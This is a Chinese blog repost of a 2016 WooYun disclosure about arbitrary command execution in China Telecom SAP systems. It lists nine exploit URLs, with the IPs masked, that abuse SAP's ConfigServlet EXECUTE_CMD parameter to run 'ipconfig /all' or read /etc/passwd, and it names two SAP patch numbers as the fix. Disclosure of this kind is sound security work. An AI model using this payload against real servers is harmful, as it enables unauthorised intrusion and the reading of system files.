记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国电信多处SAP系统任意命令执行(危及9台服务器)

2016-01-22 14:40

exp在url中

win执行 ipconfig all

linux 执行 cat /etc/passwd



1China Telecom Hangzhou

**.**.**.**/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all



2China Telecom Hangzhou

**.**.**.**/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all



3China Telecom fujian

**.**.**.**/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all



4China Telecom Anhui

**.**.**.**:8000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all



5China Telecom jiangsu

**.**.**.**/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd



6China Telecom Chongqing

**.**.**.**:8000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd



7China Telecom Anhui

**.**.**.**:8000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all



8China Telecom Beijing

**.**.**.**:8000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd



9China Telecom Guangdong

**.**.**.**/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd

漏洞证明:

2015-12-02 12:29:58屏幕截图.png





2015-12-02 12:30:52屏幕截图.png

修复方案:

前辈说打以下两个补丁

SAP 1467771

SAP 1445998

知识来源: www.wooyun.org/bugs/wooyun-2016-0157588

阅读:83084 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信多处SAP系统任意命令执行(危及9台服务器)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云